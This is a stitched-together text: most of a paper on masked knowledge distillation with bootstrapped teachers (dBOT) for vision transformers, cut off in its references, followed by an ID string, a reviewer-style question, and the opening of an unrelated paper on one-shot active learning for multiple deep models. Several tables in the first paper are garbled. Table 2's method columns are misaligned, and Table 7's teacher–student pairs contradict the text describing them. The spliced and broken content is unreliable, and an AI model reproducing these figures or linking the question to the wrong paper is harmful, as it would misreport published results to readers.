VISUAL LEARNING Self-supervised learning is an active research topic recently. Early practices revolve around contrastive learning (He et al., 2020; Chen et al., 2020; Grill et al., 2020; Caron et al., 2020; 2021) where the model output features of images transformed by different data augmentations are pulled together. With the development of Masked Language Modeling (MLM) in language pre-training (Devlin et al., 2019), researchers also introduce the training strategy of masked reconstruction to visual pre-training. BEiT (Bao et al., 2022) uses the DALL-E (Ramesh et al., 2021) to encode an image patch as the target for model reconstruction. iBOT (Zhou et al., 2021) uses an online teacher shifting the target from offline to online to make the target semantic meaningful. In addition to using the token obtained from offline or online model as reconstruct target, MAE (He et al., 2022), SimMIM (Xie et al., 2022), and MaskFeat (Wei et al., 2022a) achieve good performance in masked-image reconstruction using low-level pixels or HOG (Dalal & Triggs, 2005) features. Among them, MAE uses an asymmetric encoder-decoder structure greatly increasing the training efficiency. data2vec (Baevski et al., 2022) demonstrates good generalizations on three modalities (vision, speech, and language) by reconstructing multiple neural network layer representations. 2.2 KNOWLEDGE DISTILLATION Knowledge distillation (KD) is widely employed in model knowledge compression (Hinton et al., 2015), which improves the performance of the smaller student model by distilling the knowledge learned from a well-trained large teacher network. Further study on e.g. relational KD (Park et al., | computation pipeline | initialized teacher | classification | object detection | semantic segmentation | |----------------------|---------------------|----------------|------------------|-----------------------| | | | 0th 1st 2nd 3rd | 0th 1st 2nd 3rd 4th | 0th 1st 2nd 3rd 4th | | Supervised | DeiT | 81.8 83.6 84.3 84.3 | 49.1 50.5 52.5 52.4 | - 46.4 49.2 50.4 49.9 | | Contrastive | DINO | 83.2 84.2 84.5 84.4 | 50.1 52.5 52.9 52.7 | - 46.8 49.7 50.4 49.4 | | Autoregressive | DALL-E | 81.1 83.5 84.4 84.3 | 31.9 51.0 52.7 52.5 | - 31.9 47.4 49.6 49.3 | | Autoencoding | MAE | 83.6 84.3 84.4 84.3 | 50.6 52.9 52.7 52.5 | - 48.1 49.6 50.4 49.8 | | - | random | 77.3 83.4 84.5 84.3 | 29.2 49.6 52.4 52.7 52.4 | 25.7 47.0 49.1 49.5 49.5 | | performance variance | | 2.24 0.37 0.07 0.04 | 9.54 1.23 0.17 0.12 | - 9.19 1.15 0.54 0.23 | Table 1: The top-1 classification accuracy on ImageNet-1K, object detection AP-box on COCO with Cascade Mask R-CNN, and semantic segmentation mIoU on ADE20K with UperNet of dBOT using different models as the initialized teacher network. Note that all models are pre-trained on ImageNet-1K, including DALL-E, for a fair comparison. We perform distillation in each stage for 800 epochs. In the 1st stage, we distill from initialized teacher to obtain a student. In the subsequent (i.e., 2nd, 3rd, etc.) stages, the obtained students are leveraged as bootstrapped teacher to distill a new student. 2019), contrastive KD (Tian et al., 2019), and latent feature KD (Romero et al., 2015) is conducted to improve the performance of vanilla KD. Beyond its prominence in the field of supervised learning, KD recently cuts a figure in self-supervised learning. Concurrent work manages to adopt conventional feature distillation (Wei et al., 2022c) to match contrastive models with MIM-trained ones. Nevertheless, it shows negligible gains on MIM-trained models such as MAE. BEiT (Bao et al., 2022), MaskFeat (Wei et al., 2022a) and MVP (Wei et al., 2022b) could be seen as distilling knowledge from dVAE (Ramesh et al., 2021), HOG features (Dalal & Triggs, 2005) and language-induced model CLIP (Radford et al., 2021) within the discourse of MKD, respectively. Until now, there exists no work conferring a system-level study on the importance of how to choose adequate target representation or teacher networks to guide the learning of MKD. 3 DOES $h_\phi(\cdot)$ MATTER IN MKD? Given the general form of masked knowledge distillation as shown in Eq. (1), in this section, we aim to investigate whether the careful design of the target, i.e., teacher network $h_\phi(\cdot)$, matters. Specifically, we want to answer three questions as follows: • Whether models distilled from different $h_\phi(\cdot)$ differ in terms of their transfer performances? • Whether distilled models differ in terms of their weights and outputs? • If $h_\phi(\cdot)$ does not matter, what matters more to close the gap between students distilled from different $h_\phi(\cdot)$? To answer these questions, we employ the standard masked autoencoder framework (He et al., 2022) to give a system-level study, introduced next. Common setup. The architectural settings strictly follow (He et al., 2022). For the teacher network, we use the vanilla ViT (Dosovitskiy et al., 2021) with intact input. For the student network with masked input, we use the asymmetric encoder-decoder structure. The student’s output is further projected to a dimension the same as that of teacher’s embedding. During pre-training, we use Smooth L1 loss (Girshick, 2015) for the optimization of the student network, and the teacher network is kept fixed. Detailed settings are delayed to Appendix A.1. We pre-train models on ImageNet-1K (Deng et al., 2009) and conduct evaluation under classification on ImageNet, object detection on COCO (Lin et al., 2014), and semantic segmentation on ADE20K (Zhou et al., 2017). 3.1 PRELIMINARY STUDY We first investigate the effect of using networks initialized differently as teachers for masked knowledge distillation. Four canonical methods as pre-trained teachers are substantiated, each from a category distinguished based on their computation pipelines, i.e., DeiT (Touvron et al., 2021) for supervised learning, DINO (Caron et al., 2021) for contrastive learning, DALL-E (Ramesh et al., 2021) for autoregressive generation, and MAE (He et al., 2022) for autoencoding. The results of initialized teacher at the 0\textsuperscript{th} stage and of its distilled student at the 1\textsuperscript{st} stage are shown in Table 1. **Different \( h_\phi(\cdot) \) lead to similarly performed students.** After the first stage of masked knowledge distillation, the student consistently outperforms teacher as shown in Table 1, yielding 1.8%, 1.0%, 2.4%, and 0.7% performance gains for four different \( h_\phi(\cdot) \) respectively, demonstrating the effectiveness of masked knowledge distillation for visual representation learning. Although the performance order of different \( h_\phi(\cdot) \) is reserved after the first stage of distillation, the students distilled from different \( h_\phi(\cdot) \) have closer downstream performances compared to the original \( h_\phi(\cdot) \). The performance variance drops from 2.24 to 0.37 after the first stage of distillation. The conclusion holds true for experiments on object detection and semantic segmentation. ### 3.2 Distillation with Multiple Stages Given the observations that better teacher generally induces better outperforming student, we are motivated to use the trained student as teacher to train new student repeatedly and study whether similar trend endures. If so, we would like to seek at what stage the performances saturate for different downstream tasks, as well as the discrepancy among the results incurred by different initialized teachers. **\( h_\phi(\cdot) \) does not matter with multi-stage distillation.** The performance gain is valid but decreases with multi-stage and eventually vanishes. Take MAE being the initialized teacher as an example, students outperform teachers by +0.7%, +0.1%, -0.1% for classification, +2.3, -0.2, -0.2 points for object detection, and +1.5, +0.8, -0.6 points, for semantic segmentation, from the 0\textsuperscript{th} to the 3\textsuperscript{rd} stage. Other teachers and downstream tasks share the same conclusion. Moreover, the performance gaps of students learned from different teachers decrease, especially after multi-stage, as shown by the performance variance at different stages in the last row of Table 1. Take classification tasks for instance, the variance decreases along with the training stage, i.e., 2.24, 0.37, 0.07, 0.04, which reveals that the choice of \( h_\phi(\cdot) \) exerts little influence on the downstream performance. See Table 1 for results of more downstream tasks. To demonstrate models’ differences in terms of weights and outputs, we conduct a property analysis in Sec. 6. Similar properties are found, which verify our conclusion. **A random \( h_\phi(\cdot) \) works surprisingly well.** Since the choice of \( h_\phi(\cdot) \) does not matter, an intuitive experiment is to see what will happen when we employ a **random teacher**, in which the parameters are randomly initialized at the 0\textsuperscript{th} stage. To our surprise, using a random teacher achieves performances comparably with other pre-trained teachers. Compared to a randomly initialized model, distilled students with multiple stages achieve 6.1%, 20.4, and 21.3 performance gain on classification, object detection and semantic segmentation respectively. Empirically, object detection and semantic segmentation require one more stage to saturate compared to classification. The saturated results are on par with those induced by pre-trained teachers, which enables us to train a state-of-the-art model more efficiently, without the need of an extra pre-training stage for the initialized teacher (e.g., contrastive learning as DINO). ### 4 MKD with Bootstrapped Teachers The study in Sec. 3 motivates us to propose a multi-stage distillation pipeline for pre-training. The entire pre-training undergoes multiple stages split by breakpoints. For each stage, we fix teacher network to obtain a stable visual representation, guiding the learning of student network. The pre-trained student model is then used as a stronger teacher and distills its knowledge to a new subsequent student, providing richer visual representations. We re-initialize the student network at each breakpoint. The above process repeats itself - the teachers keep bootstrapped from the students, until a performance saturation on downstream tasks is observed. Hence, our strategy is to perform distillation with **bootstrapped teachers**. We illustrate our framework in Fig. 1c and the conceptual relations with the other two paradigms in Fig. 1. By noting \( m \) as the momentum which indicates how fast the teacher’s parameters \( \theta_t \) is updated from student’s parameters \( \theta_s \), i.e., \( \theta_t = m \cdot \theta_t + (1 - m) \cdot \theta_s \), we present the following discussions. Figure 1: Conceptual comparison of three masked image modeling paradigms. The difference between the three paradigms is how the parameters of the teacher network are updated. (a): The parameters of the teacher network are frozen during the whole training process, constructing an offline teacher. (b): Exponential moving average is applied to correlate the parameters of the student and teacher networks, constructing an online teacher. (c): dBOT uses a multi-stage distillation pipeline, i.e., the parameters of the teacher network are frozen except at breakpoints, where we assign student parameters to the teacher and re-initialize the student network. Relations with previous methods. One group of works leverages pre-trained teacher as in Fig. 1a, i.e., BElT (Bao et al., 2022). The teacher requires an extra stage of pre-training and is kept fixed with $m = 1$. Ideally, pre-trained teachers bear additional knowledge which is prone to be more semantic meaningful, prompting student’s learning. Nonetheless, the pre-training of these teachers entails a completely different computation pipeline (Wei et al., 2022a) and often additional data (Wei et al., 2022b), complicating its practical use. Another group as in Fig. 1b works with random teacher in dispense with pre-trained ones. Starting from randomness, the teachers in iBOT (Zhou et al., 2021) and data2vec (Baevski et al., 2022), however, are bootstrapped from the student typically with $m \in (0, 1)$, e.g., 0.9998 as in (Baevski et al., 2022). Although bootstrap induces improving quality of the teacher’s representation, the pipeline is plagued by its optimization instability and sensitivity towards hyper-parameters. We note that MAE uses identity mapping of pixels as the target, which is observed to function similarly as a fixed random teacher with $m = 1$, as shown in Appendix B.1. Despite its simplicity, such practice eludes synergy between the teacher and the student. Comparatively, dBOT is with $m = 0$ for every breakpoint and $m = 1$ otherwise. 5 EXPERIMENTS 5.1 PRE-TRAINING Architecture. We use different capacity Vision Transformers (Dosovitskiy et al., 2021), i.e., ViT-B/16, ViT-L/16, and ViT-H/14 for dBOT. The input image of size $224 \times 224$ is first divided by a linear projection head into non-overlapping patch tokens total of 196 for ViT-B and ViT-L, and 256 for ViT-H. We exactly follow the common setup demonstrated in Sec. 3, e.g., a student with asymmetric encoder-decoder architecture, a teacher with intact input, etc. Optimization. The learning rate is first linearly increased to the initial learning rate for the first 40 epochs and then cosine annealed to 0. The initial learning rate is set as $1.5e^{-4} \times \text{batch\_size} / 256$, with batch size being 4096 for all models. We use the AdamW optimizer (Loshchilov & Hutter, 2019) and Smooth L1 loss (Girshick, 2015) to optimize the parameters of student network. Stochastic drop rate are applied, 0.2 for ViT-B, 0.2 for ViT-L, and 0.3 for ViT-H. We use only center-crop and flipping for data augmentation. As shown in Table 1, the performance of different downstream tasks saturates at different stages. By default, we pre-train all models for classification with 2 stages, for object detection and semantic segmentation with 3 stages. 5.2 IMAGENET RESULTS We primarily focus on the end-to-end fine-tuning performance and report the top-1 validation accuracy on ImageNet-1K (Deng et al., 2009) dataset. Table 2: Comparison fine-tuning result of the previous methods on ImageNet-1K. We evaluate by the end-to-end fine-tuning protocol. All results are based on an image size of 224, except for ViT-H with an extra result with 448 image size. We perform distillation in each stage for 800 epochs and with 2 stages (our default) in total. | method | ViT-B | ViT-L | ViT-H | ViT-H<sub>448</sub> | |--------------|-------|-------|-------|---------------------| | supervised | 82.3 | 82.6 | 83.1 | - | | MoCo v3 | 83.2 | 84.1 | - | - | | DINO | 83.6 | - | - | - | methods based on masked image modeling: | method | BEiT | iBOT | MAE | data2vec | dBOT | |--------|------|------|-----|----------|------| | | 83.2 | 85.2 | - | - | 84.5 | | | 84.0 | 85.2 | - | - | 86.6 | | | 83.6 | 85.9 | 86.9| 87.8 | 87.4 | | | 84.2 | 86.2 | - | - | 88.0 | Table 3: Semi-supervised learning on ImageNet-1K with different self-supervised models. 1% and 10% represent the label fraction. ViT-B is selected as the arch. All results are based on our implementation with the official pre-trained model. | method | 1% | 10% | |--------|----|-----| | supervised | - | 68.9 | | data2vec | 48.7 | 71.2 | | MAE | 53.1 | 73.1 | | dBOT | 54.8 | 74.5 | Table 4: Object detection and instance segmentation on COCO and Semantic segmentation on ADE20K. All results are based on our implementation with the official pre-trained model. We perform distillation in each stage for 800 epochs and with 3 stages (default). | method | AP<sub>box</sub> | AP<sub>mask</sub> | mIoU | mAcc | |--------|-----------------|------------------|------|------| | | ViT-B | ViT-L | ViT-B | ViT-L | ViT-B | ViT-L | | supervised | 49.8 | 51.2 | 43.2 | 44.5 | 47.4 | 49.9 | | DINO | 50.1 | - | 43.4 | - | 48.4 | 52.3 | | MAE | 50.6 | 54.0 | 43.9 | 46.2 | 48.2 | - | | iBOT | 51.3 | - | 44.3 | - | 48.1 | 53.6 | | dBOT | 52.7 | 56.0 | 45.7 | 48.2 | 49.5 | 54.5 | Evaluation setup. We sweep the base learning rate within a range with a batch size being 1024. We warm up the learning rate during the first 5 epochs to the initial learning rate and use a cosine schedule for the rest of the epochs. We average all the patch tokens output from the last transformer block and pass them into a linear projection head for classification. We fine-tune ViT-B for 100 epochs and ViT-L and ViT-H for 50 epochs in total. Comparison with previous results. We report the fine-tuning results on ImageNet-1K, mainly focusing on the comparison of the self-supervised and supervised methods. Supervised denotes the results reported in the MAE. As shown in Table 2, dBOT achieves remarkable results with different model capacities, demonstrating its scalability. We achieved top-1 evaluation accuracy of 84.5%, 86.6%, and 87.4% with ViT-B, ViT-L, and ViT-H, yielding gains of 0.9%, 0.7%, and 0.5% compared to MAE. When fine-tuned with an image size of 448, dBOT further achieves an accuracy of 88.0%, surpassing the results obtained by MAE. Semi-supervised learning. To investigate the label efficiency of dBOT, we also show the semi-supervised results on ImageNet-1K under different labeled data availability in Table 3. We focus on the comparison with self-supervised learning methods. The label-fraction sampling strategy follows (Chen et al., 2020). dBOT outperforms MAE by 1.7 and 1.4 points using 1% and 10% of the labels, respectively, showing a higher label efficiency. 5.3 Downstream Tasks To further demonstrate the effectiveness, we consider dense prediction tasks: object detection, semantic segmentation, and instance segmentation. Object detection and instance segmentation. We consider Cascade Mask R-CNN (Cai & Vasconcelos, 2019) as the task head for object detection and instance segmentation with ViT-B and ViT-L on COCO (Lin et al., 2014). We report AP<sub>box</sub> and AP<sub>mask</sub> for object detection and instance segmentation respectively. The results are demonstrated in Table 4. dBOT outperforms the Table 5: **Ablation study with ViT-B/16 on ImageNet-1K validation set.** We report with the end-to-end fine-tuning top-1 accuracy (%). Ablation study is conducted with randomly initialized teachers. We note that models distilled from the pre-trained teachers generally share similar trends. Default settings are marked in gray. vanilla denotes \( m \) being 0 at the breakpoint and 1 otherwise. cosine(a,b) denotes \( m \) is cosine annealed from value a to b. (a) **Stage split number.** 2-stage distillation works the best. | pre-training epochs | acc | |---------------------|-----| | 1600 | 83.6| | 800-800 | 84.5| | 533-533-533 | 84.4| (b) **Epoch for each stage.** 2-stage distillation with 800 epochs for each stage works the best. | pre-training epochs | acc | |---------------------|-----| | 400-800 | 84.3| | 800-400 | 84.3| | 800-800 | 84.5| | 800-1200 | 84.3| (c) **Momentum update.** The vanilla strategy explicitly splitting stages works the best. | momentum | acc | |--------------------|-----| | vanilla | 84.5| | 0.9998 | 83.6| | 0.9999 | 83.9| | cosine(0.996,1) | 82.1| (d) **Target normalization.** Using patch representations w/o [LN] as targets works best. | target norm | acc | |--------------------|-----| | w/ [LN] | 84.3| | w/o [LN] | 84.5| (e) **Student initialization.** Re-initializing the student’s weight at breakpoints works best. | student init | acc | |--------------------|-----| | w/o re-initialize | 84.2| | w/ re-initialize | 84.5| (f) **Mask ratio.** A mask ratio of 75% works best. | mask ratio | acc | |--------------------|-----| | 0.7 | 84.3| | 0.75 | 84.5| | 0.8 | 84.2| previous self-supervised and supervised methods by a large margin, setting a new state-of-the-art result with both ViT-B and ViT-L. With ViT-B, dBOT achieves an AP\(_{box}\) of 52.7 and an AP\(_{mask}\) of 45.7, outperforming the supervised baseline pre-training by 2.9 and 2.5 points, respectively. With ViT-L, such improvement is more prominent with 4.8 and 3.6 points respectively, showing the high scalability of dBOT for model capacity in downstream dense prediction tasks. **Semantic segmentation.** We adapt UperNet (Xiao et al., 2018) as the task head for semantic segmentation with ViT-B and ViT-L on ADE20K (Zhou et al., 2017). We report the mIoU and mAcc for semantic segmentation, and the results are demonstrated in Table 4. We achieve the best performances on semantic segmentation compared to previous self-supervised methods by a nontrivial margin. dBOT improves mIoU from 47.4 to 49.5 with ViT-B, and 49.9 to 54.5 with ViT-L, yielding gains of 2.1 and 4.6 points respectively, compared to the supervised baseline. The improvement in semantic segmentation is as significant as in object detection. ### 5.4 Ablation Study **Stage split number.** We study the influence of stage number by splitting total training epochs of 1600 into varying distillation stages, from 0 to 2. Results are shown in Table 5a. 2-stage distillation works the best (for classification task), achieving 84.5% accuracy. Splitting epochs to 3-stage brings 0.1% performance drop, while all splitting strategies obtain a top-1 accuracy higher than 83.6%, indicating its generalizability. **Epoch for each stage.** Table 5b studies proper epochs needed for each stage in a 2-stage distillation pipeline. With the 2\(^{nd}\) stage distilling for 800 epochs, longer epochs for the 1\(^{st}\) stage induces 0.2% improvement (84.3% vs. 84.5%). With the 1\(^{st}\) stage distilling for 800 epochs, 800 epochs are enough for the 2\(^{nd}\) stage since 1200 epochs incur no gain. Evenly splitting the epochs in 2-stage masked knowledge distillation achieves the best performance. **Momentum update.** We use in dBOT a multi-stage distillation pipeline, which is to distill from a momentum encoder with \( m \) being 0 for every breakpoint and 1 otherwise. We further investigate other momentum update strategies commonly used in self-supervised learning. Results are shown in Table 5c. The vanilla strategy works the best. **Target normalization.** We study whether patch tokens obtained by the self-attention blocks to be used as target representation should be passed through the Layer Normalization (Ba et al., 2016). Figure 2: Average attention distance of different heads w.r.t layer number of ViT-B with different teachers and their corresponding student distilled for 2 stages. The first row showcases the teachers while the second showcases the 2\textsuperscript{nd} stage distilled student. Models using different teachers achieve the same result. The distilled students obtain more local attention compared to the teachers. Figure 3: Singular value decomposition of different layers of ViT-B with different teachers and their corresponding student distilled for 2 stages. The first row showcases the teachers while the second showcases the 2\textsuperscript{nd} stage distilled student. Models using different teachers achieve the same result. layer \([\text{LN}]\). The accuracy of models after 2-stage distillation is shown in Table 5d. Without passing through \([\text{LN}]\), the patch tokens directly obtained from the transformer block make them less suitable as target representations to guide students’ learning. **Student initialization.** We study whether student’s weight should remain when entering the next stage of distillation. Specifically, we either keep the student’s weight unchanged or re-initialize the student at each breakpoint. As shown in Table 5e, re-initializing the student’s weight works the best. **Mask ratio.** Table 5f shows the influence of the mask ratio on end-to-end fine-tuning. The optimal mask ratio for dBOT is 75%, the same as that in MAE. ## 6 Property Analysis We investigate the properties of models distilled from different teachers under certain criteria, analyzing models’ weights and outputs. Further, training efficiency is briefly discussed with previous methods. **Averaged attention distance.** We compute averaged attention distance (Dosovitskiy et al., 2021), averaged over ImageNet-1K val set, for each attention head of different blocks to understand how local and global information flows into Transformers. Average attention distance for dBOT using DeiT, DINO, MAE, DALL-E, and random as teachers are illustrated in Fig. 2. The higher the Table 6: Training time (s) per epoch for different methods with ViT-B/16, ViT-L/16, and ViT-H/14. asym. denotes whether to use an asymmetric encoder-decoder structure. All entries are tested on the same setting, i.e., with 32 NVIDIA A100-80G GPUs. | method | data2vec | BEiT | MAE | dBOT | |--------|----------|------|-----|------| | asym. | X | X | ✓ | ✓ | | ViT-B | 169 | 166 | 79 | 109 | | ViT-L | 431 | 356 | 125 | 200 | | ViT-H | 960 | 751 | 240 | 416 | Table 7: Results of classification (cls.), object detection (det.), and semantic segmentation (seg.) on IN1K, COCO, and ADE20K. For same-size teachers (colored gray), students are pre-trained with default settings. For bigger teachers, students are pre-trained for 1-stage from 2-stage distilled teachers. | teacher | student | cls. | det. | seg. | |---------|---------|------|------|------| | ViT-B | ViT-B | 84.5 | 52.7 | 49.5 | | ViT-L | ViT-L | 84.6 (+0.1) | 53.1 (+0.4) | 50.1 (+0.6) | | ViT-H | ViT-H | 84.6 (+0.1) | 53.5 (+0.8) | 50.8 (+1.3) | | ViT-L | ViT-L | 86.6 | 56.0 | 54.5 | | ViT-H | ViT-H | 86.8 (+0.2) | 56.1 (+0.1) | 55.2 (+0.7) | attention distance, models’ attention over an image is more global. Although the average attention distance of disparate initialized teachers varies greatly, their distilled students after multi-stage distillation exhibit similar behaviors, e.g., models’ attention toward local or global contents. Additionally, dBOT achieves more local attention than previous works. Singular value decomposition. We computed the percentage of top-$k$ singular values (Wall et al., 2003) of the embedding w.r.t each layer. The results are averaged over the ImageNet-1K val set. We showcase the results with $k$ varying from 1 to 5. Singular value decomposition for dBOT using DeiT, DINO, MAE, DALL-E, and random as teachers are shown in Fig. 3. The higher the percentage, the models’ output over an image is less correlated, indicating larger redundancy of its spatial representations thus less suitability for compression. Intuitively, random models at the 0th stage has the largest percentage given that pixel are merely randomly projected. The student networks distilled from different initialized teachers exhibit similar behaviors. Training efficiency. We compute the training time per epoch for different methods in Table 6. With an asymmetric encoder-decoder architecture (asym.) as the default setup, dBOT performs slower than MAE, but much faster than data2vec and BEiT. Such advantage turns more significant with models of larger size. 7 DISTILL FROM BIGGER TEACHERS Inspired by canonical practices in knowledge distillation (Hinton et al., 2015), we use larger teachers to distill smaller students, showcasing the potential of MKD in general. Specifically, we attempt to use ViT-L/H as teacher networks to distill ViT-B, and ViT-H as the teacher network to distill ViT-L. All larger teachers are first distilled for 2 stages with the default setup. We resize the image to 196 x 196 for ViT-H/14 to keep the length of its output the same as that of ViT-B/L. While we do not find substantial gains on classification results, the results by distilling from ViT-H are significantly better for dense prediction tasks compared to the default setup, i.e., +0.8 points of AP$^{box}$ and +1.3 points of mIoU with ViT-B as the student. The performance gain in distilling ViT-L from ViT-H is diminished but still valid, i.e., +0.1 AP$^{box}$ and +0.7 mIoU. We also consider MKD with data-richer teachers, e.g. CLIP, as exploratory experiments and set new state-of-the-art results for self-supervised learning. Refer to Appendix C for details. 8 CONCLUSION As a special case of MIM, we formulate MKD upon which an empirical investigation is conducted about the influence of different target representations on self-supervised masked autoencoders. The study concludes that it is not necessary to carefully choose the target representation to learn good visual representations if distillation is performed in multiple stages (i.e., with bootstrapped teachers). Instead of initializing teachers with pre-trained models, we resort to random ones for simple practice. Without an extra stage of pre-training, dBOT achieves favorable performance on image classification, object detection, and semantic segmentation. We hope our study and method will provide timely insights for self-supervised learning. REFERENCES Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Alexei Baevski, Wei-Ning Hsu, Qiantong Xu, Arun Babu, Jiatao Gu, and Michael Auli. Data2vec: A general framework for self-supervised learning in speech, vision and language. In *ICML*, 2022. Hangbo Bao, Li Dong, and Furu Wei. BEiT: BERT pre-training of image transformers. In *ICLR*, 2022. Zhaowei Cai and Nuno Vasconcelos. Cascade R-CNN: high quality object detection and instance segmentation. *TPAMI*, 2019. Mathilde Caron, Ishan Misra, Julien Mairal, Priya Goyal, Piotr Bojanowski, and Armand Joulin. Unsupervised learning of visual features by contrasting cluster assignments. In *NeurIPS*, 2020. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, 2021. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In *ICML*, 2020. Navneet Dalal and Bill Triggs. Histograms of oriented gradients for human detection. In *CVPR*, 2005. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In *CVPR*, 2009. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *NAACL*, 2019. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. In *ICLR*, 2021. Ross Girshick. Fast R-CNN. In *ICCV*, 2015. Xavier Glorot and Yoshua Bengio. Understanding the difficulty of training deep feedforward neural networks. In *ICAIS*, 2010. Jean-Bastien Grill, Florian Strub, Florent Altché, Corentin Tallec, Pierre H. Richemond, Elena Buchatskaya, Carl Doersch, Bernardo Avila Pires, Zhaohan Daniel Guo, Mohammad Gheshlaghi Azar, Bilal Piot, Koray Kavukcuoglu, Rémi Munos, and Michal Valko. Bootstrap your own latent: A new approach to self-supervised learning. In *NeurIPS*, 2020. Kaiming He, Haoqi Fan, Yuxin Wu, Saining Xie, and Ross Girshick. Momentum contrast for unsupervised visual representation learning. In *CVPR*, 2020. Kaiming He, Xinlei Chen, Saining Xie, Yanghao Li, Piotr Dollár, and Ross Girshick. Masked autoencoders are scalable vision learners. In *CVPR*, 2022. Geoffrey Hinton, Oriol Vinyals, Jeff Dean, et al. Distilling the knowledge in a neural network. In *NeurIPS Workshops*, 2015. Tsung-Yi Lin, Michael Maire, Serge Belongie, James Hays, Pietro Perona, Deva Ramanan, Piotr Dollár, and C Lawrence Zitnick. Microsoft coco: Common objects in context. In *ECCV*, 2014. Ilya Loshchilov and Frank Hutter. Decoupled weight decay regularization. In *ICLR*, 2019. Wonpyo Park, Dongju Kim, Yan Lu, and Minsu Cho. Relational knowledge distillation. In *CVPR*, 2019.
EDXkkUAIFW
In the empirical setting part, I'm confused about the setting of *50 distinct architectures*. Since it's noted in the footnote that all the experiments were conducted with the same GPU and CPU, I'm wondering whether it's still necessary to employ such method?
ONE-SHOT ACTIVE LEARNING BASED ON LEWIS WEIGHT SAMPLING FOR MULTIPLE DEEP MODELS Sheng-Jun Huang\textsuperscript{1}, Yi Li\textsuperscript{2}, Yiming Sun\textsuperscript{2} & Ying-Peng Tang\textsuperscript{1,*} College of Computer Science and Technology, Nanjing University of Aeronautics and Astronautics\textsuperscript{1} School of Physical and Mathematical Sciences, Nanyang Technological University\textsuperscript{2} \{huangsj, tangyp\}@nuaa.edu.cn \{yili, yiming005\}@ntu.edu.sg ABSTRACT Active learning (AL) for multiple target models aims to reduce labeled data querying while effectively training multiple models concurrently. Existing AL algorithms often rely on iterative model training, which can be computationally expensive, particularly for deep models. In this paper, we propose a one-shot AL method to address this challenge, which performs all label queries without repeated model training. Specifically, we extract different representations of the same dataset using distinct network backbones, and actively learn the linear prediction layer on each representation via an $\ell_p$-regression formulation. The regression problems are solved approximately by sampling and reweighting the unlabeled instances based on their maximum Lewis weights across the representations. An upper bound on the number of samples needed is provided with a rigorous analysis for $p \in [1, +\infty)$. Experimental results on 11 benchmarks show that our one-shot approach achieves competitive performances with the state-of-the-art AL methods for multiple target models. 1 INTRODUCTION The rapid advancements in deep learning have led to a substantial increase in demand for extensive labeled data points to effectively train high-performance models. However, data labeling remains costly due to its reliance on human labor. To address this challenge, active learning (AL) (Settles, 2009; Ren et al., 2021) has emerged as an effective strategy for mitigating annotation expenses. This approach estimates the potential utility of different unlabeled instances in improving the performance of a target model and selectively queries the labels of the most beneficial instances from the oracle (i.e., an expert who can provide the ground-truth label). A typical practice of AL conducts label querying and model updating iteratively to exploit the insights from model decisions, i.e., selecting one or a small batch of instances based on the model predictions and updating the target model in each iteration until the labeling budget is exhausted (Cohn et al., 1994; Huang et al., 2014). This paradigm has been widely applied in real-world scenarios (Hoi et al., 2008; Shi & Zhou, 2023). Recently, there has been a significant surge in the demand for the deployment of machine learning systems on diverse resource-constrained devices (Deng et al., 2020; Gou et al., 2021; Menghani, 2023). For example, speech recognition and face recognition systems usually need to support various types of machines with varying computing and memory resources. As a result, the task of training multiple models with varying complexities using the same labeled dataset has arisen (Cai et al., 2019), leading to a new setting of AL where there are multiple target models to be learned simultaneously (Tang & Huang, 2022). Tang & Huang (2022) provide both theoretical and empirical evidence showcasing the potential of AL in alleviating the substantial data labeling burden associated with training multiple target models. They propose an iterative AL algorithm DIAM and validate its effectiveness for multiple deep models. However, the use of iterative AL methods results in a significant increase in model training cost. This is due to the requirement of training multiple deep models at each query iteration. A potential solution is increasing the querying batch size of conventional batch-mode AL methods. *All authors contributed equally to this work. Ying-Peng Tang is the corresponding author. Nevertheless, this may lead to redundant querying (Yang & Loog, 2019). A more cost-effective strategy could be one-shot or single-shot querying, which selects the required number of unlabeled instances and makes all label queries within one iteration devoid of re-training the models. Most existing one-shot AL methods query a representative set of instances using the distance between feature vectors (Yang & Loog, 2019; Viering et al., 2019; Jin et al., 2022; Shoham & Avron, 2023). However, this approach faces challenges when handling multiple deep models, as the same instance can exhibit different feature representations in different models. This phenomenon arises due to the intrinsic representation learning of deep models, where data representations are implicitly optimized during the training process and varied network architectures yield distinct embeddings. These embeddings may contain abundant information to facilitate data selection. However, such information has not been well exploited by existing one-shot AL methods. Therefore, they may not yield optimal performances in the setting of multiple models. In this paper, we propose a one-shot AL method for multiple deep models, accompanied by a rigorous theoretical analysis. Our method is based on the fact that a deep model can be viewed as a linear prediction layer (i.e., multiple neuron models) and a nonlinear feature extractor (i.e., the network backbone). Therefore, training multiple deep models can be described as learning linear prediction layers from the outputs of distinct network backbones. In this way, active learning from diverse data representations can be formulated as optimizing a shared sampling matrix to minimize the error of each linear predictor. To facilitate computing and analysis, we consider the learning of the prediction layer as an $\ell_p$ regression problem with $p \in (0, +\infty)$. Notably, our empirical studies place particular emphasis on the case of $p = 2$, i.e., the squared loss, which is one of the most commonly used loss functions in deep learning. Specifically, suppose that there are $k$ models and $A^j \in \mathbb{R}^{n \times d}$ ($j = 1, \ldots, k$) is the feature matrix obtained by feeding the dataset into the $j$-th network backbone. Let $f : \mathbb{R} \to \mathbb{R}$ be an $L$-Lipschitz function with $f(0) = 0$. Typical choices of $f$ are activation functions such as ReLU, Sigmoid, and so on. We abuse the notation and apply $f$ to a vector $v \in \mathbb{R}^n$ coordinatewise, i.e. $f(v) = (f(v_1), \ldots, f(v_n))^T$. Suppose that $y^1, \ldots, y^c \in \mathbb{R}^n$ are $c$ label vectors and the task is to minimize the loss $\sum_{i=1}^c \|f(A^j \theta^{ij}) - y^i\|_p^p$ over $\theta^{1j}, \ldots, \theta^{cj} \in 